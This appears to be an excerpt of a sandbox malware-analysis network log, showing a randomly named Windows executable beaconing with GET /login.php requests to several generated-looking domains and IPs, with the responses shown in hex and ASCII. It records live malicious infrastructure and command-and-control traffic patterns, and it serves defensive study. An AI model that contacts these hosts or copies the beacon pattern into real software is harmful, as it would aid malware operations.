                                                                                                                                                                                                                  81192.168.2.650234208.100.26.245805128C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.776649952 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lyvyxor.com
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.221431971 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:12 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 580
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  82192.168.2.650236199.191.50.83805128C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.087395906 CET281OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: galyqaz.com
                                                                                                                                                                                                                  Cookie: vsid=903vr478893028933998491
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.582881927 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:12 GMT
                                                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                  Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                  Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                                                                                                  X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_NHOnw0G73BscnvIcyf8HaXYxUwB52N5y4R2rV77ldfg6F/P3HTMIgnr4aIPWR/fyPGslgb3huQzNdSH/7sK+hw==
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                  Data Raw: 61 39 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69 6e 69 66 72 61 6d 65 20 3d 20 74 72 75 65 3b 20 69 66 28 [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: a926<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net"> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}i
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.583087921 CET146INData Raw: 66 28 21 28 22 63 6d 70 5f 69 64 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 77 69 6e 64 6f 77 2e 63 6d 70 5f 69 64 3c 31 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 69 64 3d 30 7d 69 66 28 21 28 22 63 6d 70 5f 63 64 69 64 22 20 69 6e 20 77 69 6e 64 6f
                                                                                                                                                                                                                  Data Ascii: f(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.583098888 CET1236INData Raw: 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 70 61 72 61 6d 73 3d 22 22 7d 69 66 28 21 28 22 63 6d 70 5f 68 6f 73 74 22 20 69 6e 20 77 69 6e 64 6f 77 29 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 68 6f 73 74 3d 22 61 2e 64 65 6c 69 76 65 72 79 2e 63 6f 6e
                                                                                                                                                                                                                  Data Ascii: ){window.cmp_params=""}if(!("cmp_host" in window)){window.cmp_host="a.delivery.consentmanager.net"}if(!("cmp_cdn" in window)){window.cmp_cdn="cdn.consentmanager.net"}if(!("cmp_proto" in window)){window.cmp_proto="https:"}if(!("cmp_codesrc" in
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.583590031 CET1236INData Raw: 2e 70 75 73 68 28 66 2e 73 75 62 73 74 72 28 66 2e 69 6e 64 65 78 4f 66 28 22 63 6d 70 6c 61 6e 67 3d 22 29 2b 38 2c 32 29 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 29 7d 65 6c 73 65 7b 69 66 28 65 2e 69 6e 64 65 78 4f 66 28 22 63 6d 70 6c 61 6e
                                                                                                                                                                                                                  Data Ascii: .push(f.substr(f.indexOf("cmplang=")+8,2).toUpperCase())}else{if(e.indexOf("cmplang=")!=-1){c.push(e.substr(e.indexOf("cmplang=")+8,2).toUpperCase())}else{if("cmp_setlang" in window&&window.cmp_setlang!=""){c.push(window.cmp_setlang.toUpperCas
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.583601952 CET1236INData Raw: 73 65 61 72 63 68 2e 73 75 62 73 74 72 28 64 2e 73 65 61 72 63 68 2e 69 6e 64 65 78 4f 66 28 69 29 2b 73 2c 39 39 39 39 29 7d 65 6c 73 65 7b 72 65 74 75 72 6e 20 65 7d 7d 69 66 28 77 2e 69 6e 64 65 78 4f 66 28 22 26 22 29 21 3d 2d 31 29 7b 77 3d
                                                                                                                                                                                                                  Data Ascii: search.substr(d.search.indexOf(i)+s,9999)}else{return e}}if(w.indexOf("&")!=-1){w=w.substr(0,w.indexOf("&"))}return w}var k=("cmp_proto" in h)?h.cmp_proto:"https:";if(k!="http:"&&k!="https:"){k="https:"}var g=("cmp_ref" in h)?h.cmp_ref:locatio
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.584451914 CET1236INData Raw: 7b 74 3d 76 28 22 64 69 76 22 29 7d 69 66 28 74 2e 6c 65 6e 67 74 68 3d 3d 30 29 7b 74 3d 76 28 22 73 70 61 6e 22 29 7d 69 66 28 74 2e 6c 65 6e 67 74 68 3d 3d 30 29 7b 74 3d 76 28 22 69 6e 73 22 29 7d 69 66 28 74 2e 6c 65 6e 67 74 68 3d 3d 30 29
                                                                                                                                                                                                                  Data Ascii: {t=v("div")}if(t.length==0){t=v("span")}if(t.length==0){t=v("ins")}if(t.length==0){t=v("script")}if(t.length==0){t=v("head")}if(t.length>0){t[0].appendChild(j)}}}var m="js";var p=x("cmpdebugunminimized","cmpdebugunminimized" in h?h.cmpdebugunm
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.584465027 CET848INData Raw: 65 22 2c 22 6e 6f 6e 65 22 29 3b 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 61 62 69 6e 64 65 78 22 2c 22 2d 31 22 29 3b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 7d 65 6c 73 65 7b 77 69 6e 64 6f
                                                                                                                                                                                                                  Data Ascii: e","none");a.setAttribute("tabindex","-1");document.body.appendChild(a)}else{window.setTimeout(window.cmp_addFrame,10,b)}}};window.cmp_rc=function(h){var b=document.cookie;var f="";var d=0;while(b!=""&&d<100){d++;while(b.substr(0,1)==" "){b=b.
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.585352898 CET1236INData Raw: 64 6f 77 2e 63 6d 70 5f 72 63 28 22 22 29 7d 2c 74 72 75 65 29 7d 65 6c 73 65 7b 69 66 28 61 5b 30 5d 3d 3d 3d 22 67 65 74 54 43 44 61 74 61 22 29 7b 5f 5f 63 6d 70 2e 61 2e 70 75 73 68 28 5b 5d 2e 73 6c 69 63 65 2e 61 70 70 6c 79 28 61 29 29 7d
                                                                                                                                                                                                                  Data Ascii: dow.cmp_rc("")},true)}else{if(a[0]==="getTCData"){__cmp.a.push([].slice.apply(a))}else{if(a[0]==="addEventListener"||a[0]==="removeEventListener"){__cmp.a.push([].slice.apply(a))}else{if(a.length==4&&a[3]===false){a[2]({},false)}else{__cmp.a.p
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.585365057 CET1236INData Raw: 74 69 6f 6e 73 3a 5b 30 5d 2c 67 70 70 53 74 72 69 6e 67 3a 22 22 2c 70 69 6e 67 44 61 74 61 3a 77 69 6e 64 6f 77 2e 63 6d 70 5f 67 70 70 5f 70 69 6e 67 28 29 7d 7d 65 6c 73 65 7b 69 66 28 67 3d 3d 3d 22 68 61 73 53 65 63 74 69 6f 6e 22 7c 7c 67
                                                                                                                                                                                                                  Data Ascii: tions:[0],gppString:"",pingData:window.cmp_gpp_ping()}}else{if(g==="hasSection"||g==="getSection"||g==="getField"){return null}else{__gpp.q.push([].slice.apply(a))}}}}}};window.cmp_msghandler=function(d){var a=typeof d.data==="string";try{var
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.586185932 CET1236INData Raw: 22 29 7d 2c 22 70 61 72 61 6d 65 74 65 72 22 20 69 6e 20 62 3f 62 2e 70 61 72 61 6d 65 74 65 72 3a 6e 75 6c 6c 2c 22 76 65 72 73 69 6f 6e 22 20 69 6e 20 62 3f 62 2e 76 65 72 73 69 6f 6e 3a 31 29 7d 7d 3b 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 65 74
                                                                                                                                                                                                                  Data Ascii: ")},"parameter" in b?b.parameter:null,"version" in b?b.version:1)}};window.cmp_setStub=function(a){if(!(a in window)||(typeof(window[a])!=="function"&&typeof(window[a])!=="object"&&(typeof(window[a])==="undefined"||window[a]!==null))){window[a
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.587841034 CET1236INData Raw: 77 29 7c 7c 21 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 69 73 61 62 6c 65 67 70 70 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 65 74 47 70 70 53 74 75 62 28 22 5f 5f 67 70 70 22 29 7d 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d
                                                                                                                                                                                                                  Data Ascii: w)||!window.cmp_disablegpp){window.cmp_setGppStub("__gpp")};</script><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://galyqaz.com/px.js?ch=1"></script><script type="text/javascript" src="http://galyqaz


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  83192.168.2.6502353.94.10.34805128C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.295645952 CET353OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lymyxid.com
                                                                                                                                                                                                                  Cookie: snkz=66.23.206.109; btst=3f95d6b3439c1d0f64626ac83ec297f1|66.23.206.109|1731347463|1731347428|17|2|0
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.389913082 CET335INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:13 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=3f95d6b3439c1d0f64626ac83ec297f1|66.23.206.109|1731347473|1731347428|13|3|0; path=/; domain=.lymyxid.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  84192.168.2.650238154.212.231.82805128C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.406519890 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gadyniw.com
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.291445971 CET696INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:14 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 548
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  85192.168.2.65023944.221.84.105805128C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.424192905 CET353OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: qetyfuv.com
                                                                                                                                                                                                                  Cookie: snkz=66.23.206.109; btst=4373610fafa62658a68c9dde6ca5d09a|66.23.206.109|1731347465|1731347428|10|3|0
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.851310968 CET334INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:13 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=4373610fafa62658a68c9dde6ca5d09a|66.23.206.109|1731347473|1731347428|9|4|0; path=/; domain=.qetyfuv.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  86192.168.2.65024244.221.84.105805128C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.481998920 CET353OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: vocyzit.com
                                                                                                                                                                                                                  Cookie: snkz=66.23.206.109; btst=39d16f88231e9d77c030571879e36c23|66.23.206.109|1731347465|1731347428|18|2|0
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.909781933 CET335INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:13 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=39d16f88231e9d77c030571879e36c23|66.23.206.109|1731347473|1731347428|13|3|0; path=/; domain=.vocyzit.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  87192.168.2.650241199.191.50.83806628C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.506819963 CET281OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: galyqaz.com
                                                                                                                                                                                                                  Cookie: vsid=903vr478893028933998491
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.357505083 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:13 GMT
                                                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                  Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                  Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                                                                                                  X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_NHOnw0G73BscnvIcyf8HaXYxUwB52N5y4R2rV77ldfg6F/P3HTMIgnr4aIPWR/fyPGslgb3huQzNdSH/7sK+hw==
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                  Data Raw: 61 39 38 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69 6e 69 66 72 61 6d 65 20 3d 20 74 72 75 65 3b 20 69 66 28 [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: a98a<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net"> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}i
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.357693911 CET1236INData Raw: 66 28 21 28 22 63 6d 70 5f 69 64 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 77 69 6e 64 6f 77 2e 63 6d 70 5f 69 64 3c 31 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 69 64 3d 30 7d 69 66 28 21 28 22 63 6d 70 5f 63 64 69 64 22 20 69 6e 20 77 69 6e 64 6f
                                                                                                                                                                                                                  Data Ascii: f(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host" in window)){window.cmp_host="a.delivery.consentmanager.net
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.358042955 CET1236INData Raw: 65 64 4c 61 6e 67 73 28 29 3b 76 61 72 20 63 3d 5b 5d 3b 76 61 72 20 66 3d 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 3b 76 61 72 20 65 3d 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 76 61 72 20 61 3d 22 6c 61 6e 67 75 61 67 65 73 22 20 69 6e 20
                                                                                                                                                                                                                  Data Ascii: edLangs();var c=[];var f=location.hash;var e=location.search;var a="languages" in navigator?navigator.languages:[];if(f.indexOf("cmplang=")!=-1){c.push(f.substr(f.indexOf("cmplang=")+8,2).toUpperCase())}else{if(e.indexOf("cmplang=")!=-1){c.pus
